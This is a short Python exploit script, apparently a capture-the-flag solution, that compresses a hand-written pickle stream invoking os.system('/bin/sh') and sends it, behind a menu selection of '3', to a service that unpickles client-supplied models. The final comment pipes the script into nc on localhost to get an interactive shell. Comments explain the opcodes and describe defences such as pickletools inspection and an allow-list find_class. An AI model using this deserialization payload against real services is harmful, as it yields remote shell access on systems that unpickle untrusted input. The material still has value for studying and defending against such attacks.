
exploit.py

#!/usr/bin/env python3

import pickle
import zlib

# see: https://checkoway.net/musings/pickle/
# Hand-written protocol-0 pickle stream, read opcode by opcode:
#   c os / system   GLOBAL  - import os.system and push it
#   (               MARK
#   S'/bin/sh'      STRING  - push the argument
#   t               TUPLE   - collect everything since MARK into a tuple
#   R               REDUCE  - call the pushed callable with that tuple
#   .               STOP
# Defender takeaway: unpickling is code execution for whoever controls the
# bytes. GLOBAL followed by REDUCE is the pattern to look for;
# pickletools.dis() lists the opcodes without running the stream, and an
# Unpickler subclass whose find_class() rejects everything outside an
# allow-list stops the import before the call can happen.
SHELL = (
    "cos\n"
    "system\n"
    "(S'/bin/sh'\n"
    "tR."
)

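def main():
    """Print the two lines this script pipes to the challenge service.

    Line one is the literal ``3``; line two is the hex encoding of the
    zlib-compressed ``SHELL`` pickle stream.

    The commented-out block is kept as a record of the intended client flow:
    it decodes an embedded action log, fits a ``DecisionTreeClassifier`` on
    it, and sends the pickled, compressed model behind the same ``3``.

    NOTE(review): presumably ``3`` selects a "load model" menu entry and the
    service hex-decodes, inflates and unpickles the second line -- confirm
    against the service source. If so, the root cause is on the receiving
    side: a model accepted from a client must not be passed to
    ``pickle.loads``. Use a data-only serialization, or an ``Unpickler``
    whose ``find_class`` allows only the expected model classes.
    """
    # --- intended client flow (disabled) ----------------------------------
    # embed = lambda c: "wasdx .#F".index(c)

    # c_actions = "789ced983d72c3201085c3b2e313a451e79934aa7c1e37e9e219fa78262953a5a22437c841239088312c3f5290073bb61a4b9f16bd5d2d3cec0ffcfa7e7c309f67d5f792bd2bc99e94007d48b61bceb6fa0c051c87ef2fea53f5623362c1870335d2506c4204578130865023c95e4dd2ddefe53169034537227b9140580d4d1aad083e2a349975278560a202841e420a2115856503368212799dd5d0eddfa0863791b2d7f56ecac484c018c25814a6a33c24d99b99467b9b8f81e696216e1f22f0919d9b27444c5a7efe9eddccd04718a0e959185738dd1b57e84c5c5a46a0b0b20c17610d043904f101c9579911efd730409043508c308730874a6b98ec8d44f7baab540245ec6db937a74d71818c65036650b06637e56073bd2888e225514585bad7906836aa86ffaa1a7336088da0f21d87bbf6fa364a44d9b5772df34dd8a8fbac84a7cc33fa4bda6855f3f5bd32d21b3cdd1b91b76c5780abd962257ac32dd4bc2df1aa3b87767eba5f6c1fb5cadea655f17ff9d7e18e6e020185808a829a320ebb1f83167820"
    # actions = pickle.loads(zlib.decompress(bytes.fromhex(c_actions)))
    # X, Y = zip(*actions)
    # X = [[embed(c) for c in x] for x in X]
    # Y = [embed(y) for y in Y]

    # import sklearn.tree
    # clf = sklearn.tree.DecisionTreeClassifier()
    # clf.fit(X, Y)

    # cmodel = zlib.compress(pickle.dumps(clf)).hex()

    # print(3)
    # print(cmodel)

    # --- what is actually sent ---------------------------------------------
    # Same framing as the disabled path above (a "3" line, then one hex line),
    # but the compressed body is SHELL rather than a pickled classifier.
    payload_hex = zlib.compress(SHELL.encode()).hex()
    print(3)
    print(payload_hex)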

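# Run only when executed as a script, so importing this module prints nothing.
if __name__ == "__main__":
    main()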

# just run as: stty -icanon && (./writeup/exploit.py; cat) | nc localhost 11300